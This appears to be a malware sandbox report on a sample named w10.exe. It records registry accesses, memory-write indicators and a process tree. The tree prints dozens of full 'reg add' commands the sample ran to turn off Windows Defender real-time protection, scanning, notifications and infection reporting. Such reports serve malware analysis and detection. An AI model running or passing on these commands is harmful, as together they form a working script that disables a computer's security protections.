Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
3496	reg.exe
924	Process not Found
5396	Process not Found
7472	Process not Found
3992	reg.exe
3760	reg.exe
8240	Process not Found
944	Process not Found
2496	Process not Found
8248	Process not Found
3604	Process not Found
3604	reg.exe
3464	reg.exe
3384	reg.exe
3416	Process not Found
8576	Process not Found
5356	Process not Found
4012	Process not Found
6844	Process not Found
2852	Process not Found
8028	Process not Found
2684	Process not Found
6860	Process not Found
3580	Process not Found
3820	Process not Found
4032	Process not Found
3440	Process not Found
7072	Process not Found
6844	Process not Found
9600	Process not Found
9804	Process not Found
9616	Process not Found
3936	Process not Found
3484	reg.exe
3716	reg.exe
3396	Process not Found
3228	Process not Found
5420	Process not Found
10168	Process not Found
5476	Process not Found
8408	Process not Found
5964	reg.exe
1324	reg.exe
3248	Process not Found
1556	Process not Found
7324	Process not Found
9428	Process not Found
7716	Process not Found
4788	Process not Found
6300	Process not Found
4012	reg.exe
2840	reg.exe
6904	Process not Found
5492	Process not Found
7244	Process not Found
7380	Process not Found
3168	Process not Found
6348	Process not Found
5712	Process not Found
2916	reg.exe
2332	reg.exe
3116	Process not Found
4040	reg.exe
2508	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 2124	2536	w10.exe	31
PID 2536 wrote to memory of 2124	2536	w10.exe	31
PID 2536 wrote to memory of 2124	2536	w10.exe	31
PID 2536 wrote to memory of 2124	2536	w10.exe	31
PID 2536 wrote to memory of 3060	2536	w10.exe	32
PID 2536 wrote to memory of 3060	2536	w10.exe	32
PID 2536 wrote to memory of 3060	2536	w10.exe	32
PID 2536 wrote to memory of 3060	2536	w10.exe	32
PID 2536 wrote to memory of 2212	2536	w10.exe	34
PID 2536 wrote to memory of 2212	2536	w10.exe	34
PID 2536 wrote to memory of 2212	2536	w10.exe	34
PID 2536 wrote to memory of 2212	2536	w10.exe	34
PID 2536 wrote to memory of 2440	2536	w10.exe	36
PID 2536 wrote to memory of 2440	2536	w10.exe	36
PID 2536 wrote to memory of 2440	2536	w10.exe	36
PID 2536 wrote to memory of 2440	2536	w10.exe	36
PID 2536 wrote to memory of 2176	2536	w10.exe	38
PID 2536 wrote to memory of 2176	2536	w10.exe	38
PID 2536 wrote to memory of 2176	2536	w10.exe	38
PID 2536 wrote to memory of 2176	2536	w10.exe	38
PID 2536 wrote to memory of 2792	2536	w10.exe	40
PID 2536 wrote to memory of 2792	2536	w10.exe	40
PID 2536 wrote to memory of 2792	2536	w10.exe	40
PID 2536 wrote to memory of 2792	2536	w10.exe	40
PID 2536 wrote to memory of 2912	2536	w10.exe	42
PID 2536 wrote to memory of 2912	2536	w10.exe	42
PID 2536 wrote to memory of 2912	2536	w10.exe	42
PID 2536 wrote to memory of 2912	2536	w10.exe	42
PID 2536 wrote to memory of 2928	2536	w10.exe	44
PID 2536 wrote to memory of 2928	2536	w10.exe	44
PID 2536 wrote to memory of 2928	2536	w10.exe	44
PID 2536 wrote to memory of 2928	2536	w10.exe	44
PID 2536 wrote to memory of 2940	2536	w10.exe	46
PID 2536 wrote to memory of 2940	2536	w10.exe	46
PID 2536 wrote to memory of 2940	2536	w10.exe	46
PID 2536 wrote to memory of 2940	2536	w10.exe	46
PID 2536 wrote to memory of 2220	2536	w10.exe	48
PID 2536 wrote to memory of 2220	2536	w10.exe	48
PID 2536 wrote to memory of 2220	2536	w10.exe	48
PID 2536 wrote to memory of 2220	2536	w10.exe	48
PID 2536 wrote to memory of 2076	2536	w10.exe	49
PID 2536 wrote to memory of 2076	2536	w10.exe	49
PID 2536 wrote to memory of 2076	2536	w10.exe	49
PID 2536 wrote to memory of 2076	2536	w10.exe	49
PID 2536 wrote to memory of 2932	2536	w10.exe	50
PID 2536 wrote to memory of 2932	2536	w10.exe	50
PID 2536 wrote to memory of 2932	2536	w10.exe	50
PID 2536 wrote to memory of 2932	2536	w10.exe	50
PID 2536 wrote to memory of 2980	2536	w10.exe	51
PID 2536 wrote to memory of 2980	2536	w10.exe	51
PID 2536 wrote to memory of 2980	2536	w10.exe	51
PID 2536 wrote to memory of 2980	2536	w10.exe	51
PID 2536 wrote to memory of 2972	2536	w10.exe	53
PID 2536 wrote to memory of 2972	2536	w10.exe	53
PID 2536 wrote to memory of 2972	2536	w10.exe	53
PID 2536 wrote to memory of 2972	2536	w10.exe	53
PID 2536 wrote to memory of 2876	2536	w10.exe	54
PID 2536 wrote to memory of 2876	2536	w10.exe	54
PID 2536 wrote to memory of 2876	2536	w10.exe	54
PID 2536 wrote to memory of 2876	2536	w10.exe	54
PID 2536 wrote to memory of 2680	2536	w10.exe	55
PID 2536 wrote to memory of 2680	2536	w10.exe	55
PID 2536 wrote to memory of 2680	2536	w10.exe	55
PID 2536 wrote to memory of 2680	2536	w10.exe	55

C:\Users\Admin\AppData\Local\Temp\w10.exe
"C:\Users\Admin\AppData\Local\Temp\w10.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:1352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:2176
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:2928
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    PID:2860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:2940
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:2220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:2360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:2932
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:2972
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:2548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:2680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3040
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    PID:2140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:2704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:2820
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:2408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:2796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:2288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:2720
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:2984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:1124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:3792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:3808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
